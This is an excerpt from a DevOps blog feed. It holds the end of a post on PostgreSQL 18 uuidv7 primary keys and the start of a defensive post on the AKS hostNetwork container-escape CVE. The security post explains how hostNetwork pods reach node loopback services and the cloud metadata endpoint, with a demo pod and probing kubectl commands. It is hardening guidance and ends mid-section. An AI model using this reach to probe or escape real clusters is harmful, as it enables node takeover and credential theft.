        <a href="#h2-the-numbers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The numbers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-numbers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The performance argument is not subtle. Credativ published a <a href="https://www.credativ.de/en/blog/postgresql-en/a-deeper-look-at-old-uuidv4-vs-new-uuidv7-in-postgresql-18/">detailed comparison on PostgreSQL 18</a> using a single-column UUID primary key and 50 million rows. The initial bulk load is the headline:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Time to insert 50M rows into an empty table&quot;,&quot;unit&quot;:&quot;min&quot;,&quot;caption&quot;:&quot;PostgreSQL 18, single UUID primary key, 50M rows. Source: credativ benchmark (2026). Lower is better.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;UUIDv4 (random)&quot;,&quot;value&quot;:20,&quot;series&quot;:&quot;v4&quot;},{&quot;label&quot;:&quot;UUIDv7 (time-ordered)&quot;,&quot;value&quot;:1.8,&quot;series&quot;:&quot;v7&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;v4&quot;,&quot;color&quot;:&quot;#94a3b8&quot;},{&quot;name&quot;:&quot;v7&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>The index size gap is just as real, and it widens when you insert into a table that already holds data, which is the normal case in production:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Primary-key index size after inserting 50M rows&quot;,&quot;unit&quot;:&quot;MB&quot;,&quot;caption&quot;:&quot;PostgreSQL 18, single UUID primary key. Source: credativ benchmark (2026). Lower is better.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Into empty table&quot;,&quot;value&quot;:1981,&quot;series&quot;:&quot;UUIDv4&quot;},{&quot;label&quot;:&quot;Into empty table&quot;,&quot;value&quot;:1504,&quot;series&quot;:&quot;UUIDv7&quot;},{&quot;label&quot;:&quot;Into 50M existing&quot;,&quot;value&quot;:3956,&quot;series&quot;:&quot;UUIDv4&quot;},{&quot;label&quot;:&quot;Into 50M existing&quot;,&quot;value&quot;:3008,&quot;series&quot;:&quot;UUIDv7&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;UUIDv4&quot;,&quot;color&quot;:&quot;#94a3b8&quot;},{&quot;name&quot;:&quot;UUIDv7&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>Reads benefit too. In the same benchmark, a range scan ordered by the id column ran roughly three times faster on v7 (about 113 ms versus 318 ms for a million-row <code>ORDER BY id</code>) and needed on the order of 100 times fewer buffer hits, because rows created near each other in time also sit near each other on disk. That locality is something a random UUID can never give you.</p>
<p>Two caveats on the numbers. They come from one benchmark on a synthetic single-column table, so treat the exact figures as directional rather than a promise for your workload. And the gap is smallest on tiny tables and largest on big ones, which is the whole point: this is a problem that scales with you.</p>
<h2 id="h2-uuidv7-vs-uuidv4-vs-bigint" class="group relative scroll-mt-24">
        <a href="#h2-uuidv7-vs-uuidv4-vs-bigint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          uuidv7 vs uuidv4 vs bigint
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-uuidv7-vs-uuidv4-vs-bigint"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><code>uuidv7()</code> is not automatically the right choice. It sits between the other two options.</p>
<table>
<thead>
<tr>
<th></th>
<th>bigint sequence</th>
<th>uuidv4 (random)</th>
<th>uuidv7 (time-ordered)</th>
</tr>
</thead>
<tbody><tr>
<td>Size</td>
<td>8 bytes</td>
<td>16 bytes</td>
<td>16 bytes</td>
</tr>
<tr>
<td>Insert locality</td>
<td>Sequential (best)</td>
<td>Random (worst)</td>
<td>Sequential</td>
</tr>
<tr>
<td>Generate without the DB</td>
<td>No</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Reveals row count or order</td>
<td>Yes</td>
<td>No</td>
<td>Partially (creation time)</td>
</tr>
<tr>
<td>Leaks creation time</td>
<td>No</td>
<td>No</td>
<td>Yes</td>
</tr>
</tbody></table>
<p>The short version:</p>
<ul>
<li><strong>Reach for <code>bigint</code></strong> when a single database owns the sequence and you do not need to generate ids elsewhere. It is half the size of any UUID and the fastest option. The downside is that sequential integers leak how many rows you have and are trivially enumerable.</li>
<li><strong>Reach for <code>uuidv7()</code></strong> when you want UUIDs: ids generated by clients or multiple services, merged across shards, or created before a row reaches the database. It gives you that with almost none of the write penalty of v4.</li>
<li><strong>Reach for <code>uuidv4()</code></strong> only when you specifically need an identifier that reveals nothing, including when the row was created.</li>
</ul>
<h2 id="h2-the-one-real-catch-v7-leaks-creation-time" class="group relative scroll-mt-24">
        <a href="#h2-the-one-real-catch-v7-leaks-creation-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The one real catch: v7 leaks creation time
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-one-real-catch-v7-leaks-creation-time"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Because the timestamp sits in the high bits, anyone holding a v7 value can read roughly when it was generated. That is fine for an internal primary key. It is not fine if you expose the same value as a public identifier and the creation time is sensitive, for example a user id where signup time is private, or an order id where a competitor could infer your daily volume by diffing two ids.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>Do not assume a UUID is opaque just because it looks random. A <code>uuidv7()</code> embeds a millisecond timestamp you can decode in seconds. If an identifier is shown to users or third parties and its creation time is sensitive, keep <code>uuidv7()</code> as the internal primary key and expose a separate <code>uuidv4()</code> (or another opaque token) externally.</p>
</div></div></div><p>This is a design decision, not a reason to avoid v7. Most primary keys never leave the backend, and for those the timestamp is a feature, not a leak.</p>
<h2 id="h2-how-to-adopt-it" class="group relative scroll-mt-24">
        <a href="#h2-how-to-adopt-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to adopt it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-to-adopt-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>For new tables, set the column default and move on:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE TABLE</span> orders (
    id          uuid <span class="hljs-keyword">PRIMARY KEY</span> <span class="hljs-keyword">DEFAULT</span> uuidv7(),
    customer_id uuid <span class="hljs-keyword">NOT NULL</span>,
    total_cents <span class="hljs-type">integer</span> <span class="hljs-keyword">NOT NULL</span>,
    created_at  timestamptz <span class="hljs-keyword">NOT NULL</span> <span class="hljs-keyword">DEFAULT</span> now()
);

<span class="hljs-keyword">INSERT INTO</span> orders (customer_id, total_cents)
<span class="hljs-keyword">VALUES</span> (uuidv7(), <span class="hljs-number">4999</span>)
RETURNING id;
</code></pre><p>For an existing table that already uses random UUIDs, you do not need a risky rewrite. The existing rows keep their v4 values and stay scattered, but every new row inserted with a v7 default lands in order, so the index stops degrading from that point forward. Switch the default:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- New rows get time-ordered ids; old rows are untouched.</span>
<span class="hljs-keyword">ALTER TABLE</span> orders <span class="hljs-keyword">ALTER</span> <span class="hljs-keyword">COLUMN</span> id <span class="hljs-keyword">SET</span> <span class="hljs-keyword">DEFAULT</span> uuidv7();
</code></pre><p>If you want the full benefit on historical data, you can rebuild the table or index during a maintenance window so the existing rows are stored in key order, but for many teams simply changing the default and letting the table grow in order is enough.</p>
<p>A few adoption notes:</p>
<ul>
<li><strong>Application-side generation still works.</strong> If your services generate ids before inserting, switch the client library to a UUIDv7 generator. Most language ecosystems now have one, and the database does not care who produced the value as long as it is a valid v7.</li>
<li><strong>ORMs are catching up.</strong> Check whether your ORM lets you set a database default expression for the id column; if so, <code>DEFAULT uuidv7()</code> is the cleanest path. If it generates ids in application code, point it at a v7 library.</li>
<li><strong>You do not need PostgreSQL 18 to start.</strong> If you are on 14 to 17, you can adopt UUIDv7 today by generating it in the application or with a small SQL function, then the upgrade to 18 just lets you drop that shim for the native function. Plenty of managed Postgres is already on 18 as well (Neon, for example, defaults new projects to Postgres 18), so you can try <code>uuidv7()</code> on a fresh database without upgrading anything yourself.</li>
</ul>
<h2 id="h2-key-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-key-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Key takeaways
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-key-takeaways"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Random UUIDv4 primary keys are a silent scaling tax: random index writes mean page splits, bloated indexes, cache misses, and extra WAL once a table gets large.</li>
<li>PostgreSQL 18&#39;s <code>uuidv7()</code> is time-ordered, so inserts append at the index edge like a sequence while keeping the generate-anywhere property of a UUID. Published benchmarks show large insert-time and index-size wins on 50M rows.</li>
<li><code>bigint</code> is still the smallest and fastest key when one database owns the sequence; use <code>uuidv7()</code> when you genuinely need UUIDs, and <code>uuidv4()</code> only when you must hide creation time.</li>
<li>Adopting it is a one-line default change for new rows, with no rewrite required for existing tables. The main thing to design around is that v7 embeds a decodable timestamp, so keep it off public-facing identifiers when that matters.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[hostNetwork Is Still a Footgun: What CVE-2026-32193 Teaches Every Cluster]]></title>
      <link>https://devops-daily.com/posts/hostnetwork-footgun-cve-2026-32193</link>
      <description><![CDATA[A recent AKS advisory let an untrusted pod with hostNetwork break out to the worker node. The Azure-specific bug is patched, but the footgun that made it reachable lives on every Kubernetes cluster. Here is how the escape class works and what to actually lock down.]]></description>
      <pubDate>Tue, 30 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hostnetwork-footgun-cve-2026-32193</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[Containers]]></category><category><![CDATA[Pod Security]]></category><category><![CDATA[Networking]]></category><category><![CDATA[AKS]]></category>
      <content:encoded><![CDATA[<p>Microsoft published <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32193">CVE-2026-32193</a> in June 2026: a remote code execution flaw in Azure Kubernetes Service rated CVSS 8.8. The one-line version is short and uncomfortable. An attacker who can run an untrusted container configured with <code>hostNetwork</code> could send specially crafted requests to a host-level service that was never meant to take unauthenticated calls, exploit a path-traversal bug in it, and break out of the container onto the worker node.</p>
<p>Azure has patched the specific service. If you run AKS, the fix shipped in node image <code>2026-02-13.5</code>, and you should roll it out. But fixating on the Azure-specific bug misses the point. The reason a container could reach a privileged node service at all is <code>hostNetwork: true</code>, and that switch exists on every Kubernetes distribution. The CVE is a fresh reminder of an old truth: the moment you give a pod the host&#39;s network namespace, a pile of &quot;internal only&quot; services on that node stop being internal.</p>
<p>This post walks through what <code>hostNetwork</code> actually changes, why &quot;it only listens on localhost&quot; is not a security boundary, the NetworkPolicy gotcha that catches people out, and the concrete controls that stop this class of escape regardless of which cloud you run on.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><code>hostNetwork: true</code> drops the pod&#39;s network namespace. The pod shares the node&#39;s network stack, so it can reach anything listening on the node&#39;s loopback (<code>127.0.0.1</code>) and link-local addresses, including cloud metadata endpoints.</li>
<li>Many node-local daemons and cloud agents bind to localhost with no authentication because they assume only the node can reach them. <code>hostNetwork</code> breaks that assumption. CVE-2026-32193 is one instance of the pattern.</li>
<li>Kubernetes NetworkPolicy does <strong>not</strong> apply to <code>hostNetwork</code> pods. Your egress rules will not save you here.</li>
<li>The fix is policy, not patching: forbid host namespaces for normal workloads with Pod Security Admission or an admission controller, audit who already has them, and block workload access to the metadata endpoint.</li>
<li>Reserve <code>hostNetwork</code> for the few system components that genuinely need it (CNI agents, kube-proxy, some node exporters) and keep them out of namespaces where application teams deploy.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A working knowledge of Kubernetes pods and namespaces</li>
<li><code>kubectl</code> access to a cluster you can audit (read access to pods across namespaces)</li>
<li>Familiarity with Linux namespaces at a high level</li>
<li>Optional: a policy engine such as Kyverno or Gatekeeper, or Pod Security Admission enabled on your namespaces</li>
</ul>
<h2 id="h2-what-cve-2026-32193-actually-was" class="group relative scroll-mt-24">
        <a href="#h2-what-cve-2026-32193-actually-was" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What CVE-2026-32193 actually was
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-cve-2026-32193-actually-was"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The advisory is terse, so here is what the published metadata tells us and what it does not.</p>
<ul>
<li><strong>Class:</strong> CWE-22, improper limitation of a pathname to a restricted directory (path traversal).</li>
<li><strong>Score:</strong> CVSS 8.8, vector <code>AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</code>.</li>
<li><strong>Affected:</strong> Azure Kubernetes Service before node image <code>2026-02-13.5</code>.</li>
<li><strong>Condition:</strong> the attacker can schedule or run an untrusted container with <code>hostNetwork</code> enabled.</li>
</ul>
<p>Two parts of that vector matter for the lesson. <code>AV:L</code> (local) and <code>PR:L</code> (low privileges) mean the attacker is already inside a container on the node, not on the public internet. That is a normal day for a multi-tenant cluster or any cluster that runs partially trusted workloads, CI jobs, or customer code. And <code>S:C</code> (scope changed) is the headline: the compromise crosses a security boundary. A process confined to a container ends up controlling the node, which is a different security authority than the workload that started it.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>If you run AKS, confirm your node images are at <code>2026-02-13.5</code> or later. Check with <code>kubectl get nodes -o wide</code> and compare the node image version, or review the <a href="https://learn.microsoft.com/en-us/azure/aks/security-bulletins/overview">AKS security bulletins</a>. Patching closes this specific service, but the rest of this post is about the door it came through.</p>
</div></div></div><p>The path-traversal flaw itself is Azure&#39;s to fix and they fixed it. What you own is the condition that exposed it.</p>
<h2 id="h2-what-hostnetwork-actually-does" class="group relative scroll-mt-24">
        <a href="#h2-what-hostnetwork-actually-does" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What hostNetwork actually does
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-hostnetwork-actually-does"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A normal pod gets its own network namespace. It has its own loopback interface, its own set of listening sockets, and its own view of the network. When that pod talks to <code>127.0.0.1</code>, it reaches itself, not the node.</p>
<p>Setting <code>hostNetwork: true</code> removes that boundary. The pod runs in the node&#39;s network namespace instead of its own.</p>
<pre><code class="hljs language-text">Normal pod                          hostNetwork: true
+-------------------------+         +-------------------------+
|  pod netns              |         |  (no pod netns)         |
|   lo -&gt; the pod itself  |         |   shares the NODE netns |
|   eth0 via CNI          |         |                         |
+-----------+-------------+         +-----------+-------------+
            |                                   |
            | CNI / NetworkPolicy applies       | talks to the node&#x27;s
            v                                   v stack directly
+-------------------------+         +-------------------------+
|  node network namespace |         |  node network namespace |
|   127.0.0.1:&lt;kubelet&gt;   |  &lt;----  |   127.0.0.1:&lt;kubelet&gt;   |
|   127.0.0.1:&lt;agents&gt;    |  reach  |   127.0.0.1:&lt;agents&gt;    |
|   169.254.169.254 IMDS  |  these  |   169.254.169.254 IMDS  |
+-------------------------+         +-------------------------+
</code></pre><p>Now <code>127.0.0.1</code> from inside the pod is the node&#39;s loopback. Every service bound to the node&#39;s loopback is one connection away. So is the cloud metadata endpoint at <code>169.254.169.254</code> and any other link-local address the node can reach. The pod did not gain a new capability in the Linux sense. It gained reach.</p>
<p>You can confirm the effect quickly. A <code>hostNetwork</code> pod sees the node&#39;s interfaces and hostname:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># A pod that shares the node&#x27;s network stack.</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hostnet-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostNetwork:</span> <span class="hljs-literal">true</span>          <span class="hljs-comment"># the footgun</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">shell</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">&#x27;sleep&#x27;</span>, <span class="hljs-string">&#x27;infinity&#x27;</span>]
</code></pre><pre><code class="hljs language-bash">kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- hostname        <span class="hljs-comment"># prints the NODE&#x27;s hostname</span>
kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- ss -lntp         <span class="hljs-comment"># lists sockets the NODE is listening on</span>
kubectl <span class="hljs-built_in">exec</span> hostnet-demo -- curl -s http://127.0.0.1:10248/healthz   <span class="hljs-comment"># kubelet healthz, on the node&#x27;s loopback</span>
</code></pre><p>That last command is harmless on its own. The problem is everything else that also listens on the node&#39;s loopback and assumes nobody untrusted can connect.</p>
<h2 id="h2-it-only-listens-on-localhost-is-not-a-boundary" class="group relative scroll-mt-24">
        <a href="#h2-it-only-listens-on-localhost-is-not-a-boundary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          "It only listens on localhost" is not a boundary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-it-only-listens-on-localhost-is-not-a-boundary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A huge amount of software binds to <code>127.0.0.1</code> and treats that as authentication. The mental model is &quot;only code running on this machine can reach me, and code running on this machine is already trusted.&quot; On a single-tenant VM that is roughly true. On a Kubernetes node running mixed workloads it is not, because <code>hostNetwork</code> lets a pod become &quot;code running on this machine&quot; for network purposes.</p>
<p>The list of things that commonly listen on a node&#39;s loopback or link-local addresses is long:</p>
<ul>
<li>Kubelet&#39;s read-only and healthz endpoints</li>
<li>Cloud provider node agents that broker bootstrap credentials and node identity</li>
<li>The instance metadata service (IMDS) at <code>169.254.169.254</code>, which hands out the node&#39;s cloud identity and, on many setups, tokens for it</li>
<li>Local proxies, log shippers, and CSI or CNI helper sockets</li>
<li>Debug and admin endpoints that developers assumed were unreachable</li>
</ul>
<p>CVE-2026-32193 is the cloud-agent case: a node-local service that brokers privileged operations trusted its callers and had a path-traversal bug. With <code>hostNetwork</code>, an untrusted pod reached it and turned a parsing flaw into node control. This is the same shape as the IMDS credential-theft problem that has bitten cloud Kubernetes for years. If a workload can reach <code>169.254.169.254</code>, it can often assume the node&#39;s cloud identity, and on a node that means the kubelet&#39;s permissions and any IAM role attached to the node pool.</p>
<p>The takeaway is not &quot;this one Azure service was buggy.&quot; It is that a node runs a small fleet of privileged local services that were designed assuming the network namespace boundary holds. <code>hostNetwork</code> removes the boundary, so any bug in any of them becomes a node takeover.</p>
<h2 id="h2-the-networkpolicy-gotcha" class="group relative scroll-mt-24">
        <a href="#h2-the-networkpolicy-gotcha" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The NetworkPolicy gotcha
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-networkpolicy-gotcha"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part that surprises people. You might assume a default-deny egress NetworkPolicy would stop a <code>hostNetwork</code> pod from reaching the metadata endpoint or a node-local service. It does not.</p>
<p>Kubernetes NetworkPolicy is implemented by the CNI plugin against pod network namespaces. A <code>hostNetwork</code> pod has no pod network namespace. Its traffic originates from the node&#39;s stack, which the CNI does not police the same way. The upstream documentation is explicit that NetworkPolicy behavior for <code>hostNetwork</code> pods is undefined, and in practice most CNIs do not enforce policy on them.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># This will NOT reliably stop a hostNetwork pod from reaching IMDS.</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">app</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">&#x27;Egress&#x27;</span>]
  <span class="hljs-comment"># No egress rules = deny all egress... for pods with their own netns.</span>
  <span class="hljs-comment"># hostNetwork pods bypass this.</span>
</code></pre><p>So the defense cannot be &quot;lock down egress with NetworkPolicy.&quot; If a pod has <code>hostNetwork</code>, you have already lost the network-layer control. The defense has to be earlier: do not let untrusted workloads set <code>hostNetwork</code> in the first place.</p>
<h2 id="h2-step-1-find-out-who-already-has-it" class="group relative scroll-mt-24">
        <a href="#h2-step-1-find-out-who-already-has-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: find out who already has it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
